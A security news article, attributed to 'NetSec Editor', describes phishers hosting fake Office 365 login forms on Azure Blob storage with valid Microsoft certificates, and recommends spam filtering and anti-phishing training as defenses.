Phishers Using Azure Blog Storage to Host Phishing Forms with Valid Microsoft SSL Certificate

Cybercriminals are using Microsoft Azure Blog storage to host phishing forms. The site hosting the malicious files has a genuine Microsoft SSL certificate which adds authenticity to the campaign. Similar tactics have been used in the past for Dropbox phishing scams and attacks that impersonate other cloud storage platforms.

A typical phishing scenario involves an email being sent with a button or hyperlink that the user is requested to click to access a cloud-hosted file. When the link is clicked they are directed to a website where they are required to enter login credentials – Such as Office 365 credentials – to access the file.

At this point the scam often falls down. Oftentimes the webpage that is visited looks unusual, does not start with HTTPS, or the site has an invalid SSL certificate. While visiting such a domain a big red flag will be raised. However, if the user visits a familiar looking domain and the SSL certificate is valid and has been issued to a trusted brand, the likelihood of the user proceeding and entering login credentials is far higher.

That is exactly the case with Azure blog storage. While the domain may look unfamiliar, it is a valid Windows domain ending with .blob.core.windows.net and is secured with an SSL certificate. A further check will reveal that the certificate is valid and has been issued by Microsoft IT TLS CA 5. A genuine-looking Office 365 login form will appear and credentials will need to be entered to gain access to the document – email and password. This is likely to seem perfectly reasonable since the user is accessing a Microsoft document hosted on a Microsoft site.

However, entering in credentials into the login box will see that information sent to a server controlled by the attackers. The user will be advised that the document is being opened, although they will be directed to a different Microsoft site. While this is a red flag, by this time it is too late as the user’s credentials have already been stolen.

In this case, it was Office 365 credentials that the attackers were attempting to obtain, although the scam could similarly be conducted to obtain Azure credentials or other Microsoft logins.

Preventing email-based phishing attacks is easiest with anti-phishing controls to protect the email gateway and prevent messages from reaching inboxes. An advanced spam filtering solution will ensure that the majority of emails are blocked. Office 365 users should strongly consider augmenting Microsoft Office 365 with a third-party spam filter for greater protection.

No anti-phishing solution will prevent all phishing emails from reaching inboxes, so it is vital for employees to be taught security best practices and to receive specific anti-phishing training. In addition to providing training on the most common phishing scams, it is important for end users to be educated on phishing scams that abuse cloud services and object store URLs to ensure scams like this can be recognized as such.

Author: NetSec Editor